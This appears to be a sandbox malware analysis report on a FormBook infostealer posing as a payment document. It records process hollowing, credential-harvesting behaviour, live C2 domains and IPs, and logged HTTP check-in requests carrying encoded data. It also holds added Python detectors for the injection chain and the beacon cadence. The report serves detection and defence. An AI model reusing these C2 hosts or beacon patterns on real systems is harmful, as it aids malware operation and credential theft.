
Windows Analysis Report
Payment Copy #190922-001.exe

Overview

General Information

Sample name: Payment Copy #190922-001.exe
Analysis ID: 1574653
MD5: 6ad492e20a37cb8ae67231fa9059df17
SHA1: 822ee5217bf832a320095b45a65c75d1f147bde8
SHA256: 3c22db2dc305a5605630a009337d6dcf8ed36c132a5269b3fd6146a175813f67

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

  • System is w11x64_office
  • Payment Copy #190922-001.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\Payment Copy #190922-001.exe" MD5: 6AD492E20A37CB8AE67231FA9059DF17)
    • svchost.exe (PID: 8076 cmdline: "C:\Users\user\Desktop\Payment Copy #190922-001.exe" MD5: B96D1C078A724E31B6F98CDB999E47F6)
      • gXhpelxbquSwSp.exe (PID: 6880 cmdline: "C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 4828 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: CE6B6D39FDAB5FB8D87953BAEB662132)
          • firefox.exe (PID: 6060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 4E82C81BC54B7858AA507CA58D0E3FA2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
(3 further entries are not expanded in the report)

System Summary

Source: Process started; Author: Christian Burkard (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe", ParentImage: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe, ParentProcessId: 6880, ParentProcessName: gXhpelxbquSwSp.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 4828, ProcessName: xwizard.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ParentImage: C:\Users\user\Desktop\Payment Copy #190922-001.exe, ParentProcessId: 7888, ParentProcessName: Payment Copy #190922-001.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ProcessId: 8076, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ParentImage: C:\Users\user\Desktop\Payment Copy #190922-001.exe, ParentProcessId: 7888, ParentProcessName: Payment Copy #190922-001.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Copy #190922-001.exe", ProcessId: 8076, ProcessName: svchost.exe
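The two process-creation records above carry the whole injection chain: svchost.exe (PID 8076) is created by the sample but its command line is the sample's own path, and xwizard.exe (PID 4828) is started from SysWOW64 by a binary in a randomly named Program Files (x86) directory. The following is an added example, not part of the Joe Sandbox report and not the Sigma rules themselves: it rebuilds the two events (plus a constructed benign svchost.exe launched by services.exe as a control) and runs four plain-Python checks that capture the ideas behind the matched rules. The svchost parent allowlist is an assumption to tune per environment.

```python
"""Process-creation checks for the injection chain shown in the Sigma entries above.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from the
"Process started" records (image, command line, PIDs and parent as listed there);
the third event is a constructed benign control. The checks re-implement the idea
behind the matched rules in plain Python; SVCHOST_PARENTS is an assumption.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


INJECTOR = r"C:\Users\user\Desktop\Payment Copy #190922-001.exe"
DECOY = (r"C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal"
         r"\gXhpelxbquSwSp.exe")

EVENTS = [
    # svchost.exe (PID 8076) created by the sample; its command line is the sample's
    # own path, i.e. the hollowed child inherited the injector's command line.
    ProcEvent(8076, r"C:\Windows\SysWOW64\svchost.exe", f'"{INJECTOR}"', 7888, INJECTOR),
    # xwizard.exe (PID 4828) started from SysWOW64 by the binary in the random directory.
    ProcEvent(4828, r"C:\Windows\SysWOW64\xwizard.exe", r'"C:\Windows\SysWOW64\xwizard.exe"',
              6880, DECOY),
    # Constructed benign control: services.exe hosting a normal service group.
    ProcEvent(1234, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p", 700,
              r"C:\Windows\System32\services.exe"),
]

# Parents that legitimately spawn svchost.exe (assumption; extend for your estate).
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "svchost.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def cmdline_image(cmdline: str) -> str:
    """First token of a command line, honouring a quoted executable path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def image_cmdline_mismatch(ev: ProcEvent) -> bool:
    """Hollowing tell: the executable named in the command line is not the mapped image."""
    return basename(cmdline_image(ev.cmdline)) != basename(ev.image)


def uncommon_svchost_parent(ev: ProcEvent) -> bool:
    return basename(ev.image) == "svchost.exe" and basename(ev.parent_image) not in SVCHOST_PARENTS


def xwizard_outside_system32(ev: ProcEvent) -> bool:
    """xwizard.exe is expected under System32; the SysWOW64 copy is what fired here."""
    return basename(ev.image) == "xwizard.exe" and not ev.image.lower().startswith("c:\\windows\\system32\\")


def system_binary_from_user_path(ev: ProcEvent) -> bool:
    """A Windows binary whose parent lives under a user-writable profile directory."""
    return ev.image.lower().startswith("c:\\windows\\") and ev.parent_image.lower().startswith("c:\\users\\")


CHECKS = {
    "image_cmdline_mismatch": image_cmdline_mismatch,
    "uncommon_svchost_parent": uncommon_svchost_parent,
    "xwizard_outside_system32": xwizard_outside_system32,
    "system_binary_from_user_path": system_binary_from_user_path,
}


def run_checks(events):
    """Return {pid: sorted names of checks that fired}; PIDs with no hit are omitted."""
    out = {}
    for ev in events:
        hits = sorted(name for name, fn in CHECKS.items() if fn(ev))
        if hits:
            out[ev.pid] = hits
    return out


if __name__ == "__main__":
    for pid, hits in run_checks(EVENTS).items():
        print(pid, hits)
```

The command-line mismatch is the check worth keeping on even where the Sigma rules are noisy: a legitimately started svchost.exe always carries an svchost.exe command line, so a child whose PEB command line names a different executable is a direct sign that the parent created it suspended and replaced its image.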
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T13:18:12.563243+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.24 | 49777 | 103.23.149.28 | 80 | TCP
2024-12-13T13:18:37.445528+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.24 | 49788 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:52.731892+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.24 | 49792 | 172.67.155.214 | 80 | TCP
2024-12-13T13:19:08.144035+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.24 | 49796 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:23.813931+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.24 | 49803 | 199.59.243.227 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T13:18:29.342602+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49781 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:32.027554+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49785 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:33.730010+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49786 | 84.32.84.32 | 80 | TCP
2024-12-13T13:18:44.629294+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49789 | 172.67.155.214 | 80 | TCP
2024-12-13T13:18:47.329255+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49790 | 172.67.155.214 | 80 | TCP
2024-12-13T13:18:48.604997+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49791 | 172.67.155.214 | 80 | TCP
2024-12-13T13:19:00.074872+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49793 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:02.748122+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49794 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:04.476937+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49795 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:15.104234+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49797 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:17.766303+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49799 | 199.59.243.227 | 80 | TCP
2024-12-13T13:19:19.611952+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.24 | 49801 | 199.59.243.227 | 80 | TCP
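Read together, the two Suricata tables above describe a cadence rather than a set of IP addresses: the alerts for SID 2855464 (the POST check-in signature named under Networking) arrive in groups of three to one destination, each group is closed by a single SID 2855465 (GET) alert to the same destination, and the client then moves to the next destination after a pause of about seven seconds. The following is an added example, not part of the Joe Sandbox report: ROWS is constructed from the two tables (timestamp, SID, source port, destination IP), the SID-to-verb mapping is taken from the signature names listed under Networking, and the functions recover the burst shape, the rotation order, the inter-burst gaps and the source-port progression.

```python
"""Check-in cadence recovered from the two Suricata alert tables above.

Added example, not part of the Joe Sandbox report. ROWS is constructed from the
alert tables (one tuple per alert); SID_VERB comes from the Suricata signature
names under Networking (2855465 = FormBook CnC Checkin (GET), 2855464 = (POST)).
"""
from datetime import datetime

SID_VERB = {2855465: "GET", 2855464: "POST"}

ROWS = [  # (timestamp, SID, source port, destination IP) copied from the tables
    ("2024-12-13T13:18:12.563243+0100", 2855465, 49777, "103.23.149.28"),
    ("2024-12-13T13:18:29.342602+0100", 2855464, 49781, "84.32.84.32"),
    ("2024-12-13T13:18:32.027554+0100", 2855464, 49785, "84.32.84.32"),
    ("2024-12-13T13:18:33.730010+0100", 2855464, 49786, "84.32.84.32"),
    ("2024-12-13T13:18:37.445528+0100", 2855465, 49788, "84.32.84.32"),
    ("2024-12-13T13:18:44.629294+0100", 2855464, 49789, "172.67.155.214"),
    ("2024-12-13T13:18:47.329255+0100", 2855464, 49790, "172.67.155.214"),
    ("2024-12-13T13:18:48.604997+0100", 2855464, 49791, "172.67.155.214"),
    ("2024-12-13T13:18:52.731892+0100", 2855465, 49792, "172.67.155.214"),
    ("2024-12-13T13:19:00.074872+0100", 2855464, 49793, "199.59.243.227"),
    ("2024-12-13T13:19:02.748122+0100", 2855464, 49794, "199.59.243.227"),
    ("2024-12-13T13:19:04.476937+0100", 2855464, 49795, "199.59.243.227"),
    ("2024-12-13T13:19:08.144035+0100", 2855465, 49796, "199.59.243.227"),
    ("2024-12-13T13:19:15.104234+0100", 2855464, 49797, "199.59.243.227"),
    ("2024-12-13T13:19:17.766303+0100", 2855464, 49799, "199.59.243.227"),
    ("2024-12-13T13:19:19.611952+0100", 2855464, 49801, "199.59.243.227"),
    ("2024-12-13T13:19:23.813931+0100", 2855465, 49803, "199.59.243.227"),
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def sorted_alerts(rows):
    """(datetime, verb, source port, destination) in time order."""
    return sorted(((parse_ts(ts), SID_VERB[sid], sport, dst) for ts, sid, sport, dst in rows),
                  key=lambda a: a[0])


def bursts(rows):
    """Group alerts into bursts: consecutive alerts to one destination, closed by a GET.
    Returns [(destination, [verbs], first alert time, last alert time)]."""
    out, cur = [], None
    for ts, verb, _sport, dst in sorted_alerts(rows):
        if cur is None or cur[0] != dst:       # destination changed without a closing GET
            if cur:
                out.append(tuple(cur))
            cur = [dst, [], ts, ts]
        cur[1].append(verb)
        cur[3] = ts
        if verb == "GET":                       # the GET closes the burst
            out.append(tuple(cur))
            cur = None
    if cur:
        out.append(tuple(cur))
    return out


def burst_shapes(rows):
    """Compact per-burst shape, e.g. ('84.32.84.32', 'PPPG')."""
    return [(dst, "".join("G" if v == "GET" else "P" for v in verbs))
            for dst, verbs, _s, _e in bursts(rows)]


def rotation_order(rows):
    """Destinations in the order the client first contacted them."""
    order = []
    for dst, _verbs, _s, _e in bursts(rows):
        if dst not in order:
            order.append(dst)
    return order


def inter_burst_gaps(rows):
    """Seconds from the GET that closes one burst to the first alert of the next."""
    b = bursts(rows)
    return [(b[i + 1][2] - b[i][3]).total_seconds() for i in range(len(b) - 1)]


def source_ports_monotonic(rows):
    """True when source ports only increase over time, consistent with a single
    client socket loop walking the ephemeral range."""
    ports = [sport for _ts, _v, sport, _d in sorted_alerts(rows)]
    return all(a < b for a, b in zip(ports, ports[1:]))


if __name__ == "__main__":
    print(burst_shapes(ROWS))
    print(rotation_order(ROWS))
    print([round(g, 1) for g in inter_burst_gaps(ROWS)])
    print(source_ports_monotonic(ROWS))
```

The shapes that come out are one lone GET to 103.23.149.28 followed by four PPPG bursts, with gaps of roughly 17, 7, 7 and 7 seconds between bursts and strictly increasing source ports throughout. For hunting in proxy or flow logs, that three-POST-then-GET rhythm across several www.* hosts is a more durable indicator than any of the four addresses, which rotate per campaign.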

AV Detection

Source: http://www.telepzow.fit/oizn/; Avira URL Cloud: Label: phishing
Source: http://www.telepzow.fit/oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf; Avira URL Cloud: Label: phishing
Source: Payment Copy #190922-001.exe; ReversingLabs: Detection: 36%
Source: Yara match; File source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Payment Copy #190922-001.exe; Joe Sandbox ML: detected
Source: Payment Copy #190922-001.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596619254.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP; source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: xwizard.pdb; source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb; source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP; source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: xwizard.pdbGCTL; source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp

Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49788 -> 84.32.84.32:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49785 -> 84.32.84.32:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49790 -> 172.67.155.214:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49777 -> 103.23.149.28:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49789 -> 172.67.155.214:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49794 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49792 -> 172.67.155.214:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49799 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49781 -> 84.32.84.32:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49797 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49801 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49793 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49791 -> 172.67.155.214:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49786 -> 84.32.84.32:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49796 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.24:49803 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.24:49795 -> 199.59.243.227:80
Source: Joe Sandbox View; IP Address: 199.59.243.227
Source: Joe Sandbox View; IP Address: 84.32.84.32
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: NTT-LT-ASLT
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (7 occurrences)
Source: global traffic; HTTP traffic detected:
  GET /jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.y6h6kn.top
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic; HTTP traffic detected:
  GET /z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.thesnusgang.fun
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic; HTTP traffic detected:
  GET /oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.telepzow.fit
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic; HTTP traffic detected:
  GET /yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.dnft.immo
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: global traffic; HTTP traffic detected:
  GET /0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.deadshoy.tech
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.0000000005ED2000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004C42000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A492000.00000004.80000000.00040000.00000000.sdmp; String found in binary or memory: .www.linkedin.comTRUE/TRUE13409778514166452bscookie equals www.linkedin.com (Linkedin)
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: `t.www.linkedin.combscookiev20? equals www.linkedin.com (Linkedin)
Source: global traffic; DNS traffic detected: DNS query: srtb.msn.com
Source: global traffic; DNS traffic detected: DNS query: www.y6h6kn.top
Source: global traffic; DNS traffic detected: DNS query: www.thesnusgang.fun
Source: global traffic; DNS traffic detected: DNS query: www.telepzow.fit
Source: global traffic; DNS traffic detected: DNS query: www.dnft.immo
Source: global traffic; DNS traffic detected: DNS query: www.deadshoy.tech
Source: unknown; HTTP traffic detected:
  POST /z4qr/ HTTP/1.1
